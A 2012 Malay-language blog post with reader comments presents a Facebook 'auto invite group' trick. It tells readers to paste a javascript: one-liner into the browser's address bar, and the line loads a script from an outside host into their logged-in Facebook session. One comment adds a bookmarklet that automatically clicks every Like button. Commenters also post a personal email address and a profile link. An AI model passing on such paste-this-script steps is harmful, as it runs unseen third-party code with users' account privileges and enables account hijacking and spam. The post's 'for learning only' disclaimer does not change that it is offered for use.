Saturday, 28 July 2012

Script Auto Invite Group


Assalamualaikum dan salam sejahtera.Hari ini aku nak share dengan korang satu script auto invite.Apa tu?
Script ni fungsi dia untuk invite semua friend korang ke dalam group korang.Best?hehe

CREDIT TO : Why So Sad DotMy & Godam Crewz

Join group : White Hat Hacker Crewz


1. Ok mula-mula masuk ke group target korang.Lepas tu copy script ni :

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://www.devilsuniverse.com/design/js/f.js';})();

2. Kemudian Paste script tu dekat ADDRESS BAR.tempat korang tulis link website tu la.
Tekan enter!


Bagi pengguna chrome macam biasa tulis javascript: terlebih dahulu sebelum paste script :)

3.ENJOY!

note : script ni berfungsi bagi semua member.walaupun bukan admin pun boleh guna :)


AMARAN! :
AKU SHARE INI UNTUK TUJUAN PEMBELAJARAN.JANGAN DISALAHGUNAKAN!


Item Reviewed: Script Auto Invite Group Description: Rating: 5 Reviewed By Unknown

Share:

24 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. Hi ! Tak jadi pun .

    ReplyDelete
  3. HI! mula2 padam semua link dekat address bar.lepas tu tulis
    javascript:
    kemudian paste script di depan perkataan tu

    ReplyDelete
  4. dah tekan enter tapi jadi link asal dye balik pastu macam x de effect pun

    ReplyDelete
  5. kalo guna IE cm ne lak?

    ReplyDelete
  6. wow!! jd la... igt x jd td... hehe thnx...

    ReplyDelete
  7. kalau guna https emang tak jadi..
    kena guna http

    ReplyDelete
  8. group kene open baru boleh kot

    ReplyDelete
  9. nak rnye ade x script auto like status orng,,kalau kite g at timeline dia,,then paste script 2..nnty dia like stu2 status kwn kite??

    dulu aq ade..tp dah hilang,,


    Hope Admin ade script nye

    ReplyDelete
  10. try yg ni.rasanya masih work :)

    javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName("input");for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(ExpandComm[e].getAttribute("name") == "view_all")ExpandComm[e].click()}}function JEMPOLERS(){jempol = document.getElementsByTagName("button");for(j = 0; j < jempol.length; j++){myClass = jempol[j].getAttribute("class");if(myClass != null && myClass.indexOf("like_link") >= 0)if(jempol[j].getAttribute("name") == "like")jempol[j].click()};}function JEMPOLERC(){buttons = document.getElementsByTagName("button");for(x = 0; x < buttons.length; x++){myClass = buttons[x].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(buttons[x].getAttribute("title") == "Like this comment")buttons[x].click()};}function updateTime(){ex=ex+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}alert('Facebook Auto Like Javascript provided by\n\nIrsyad');updateTime();window.setInterval(updateTime, 1000);void(0)

    ReplyDelete
  11. @syaz_zaimi : javascript ada dalam kotak hijau diatas tq.

    ReplyDelete
  12. masih jadi lagi trick ni.pastikan kalau pengguna chrome padam semua url di address bar.lepas tu tulis javascript: baru paste script auto invite.group tu kena open baru senang.

    ReplyDelete
  13. reaperz . awat ad tulus (security check required) ?

    ReplyDelete
  14. rasanya fb dah sekat script ni.

    ReplyDelete
  15. asal x dpt...fb kwn aq dpt ...tpi fb aq x dpt nk auto invite group camner tuh

    ReplyDelete
  16. Script ni dah tak boleh guna.guna script yang baru

    ReplyDelete
  17. mane scrip yg baru leh kasi x? send kat fb aq
    wwww.facebook.com/sakaratulamutx

    ReplyDelete
  18. boleh email sy apa scrip utk auto invite dlm group
    streamyx12@gmail.com

    ReplyDelete

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com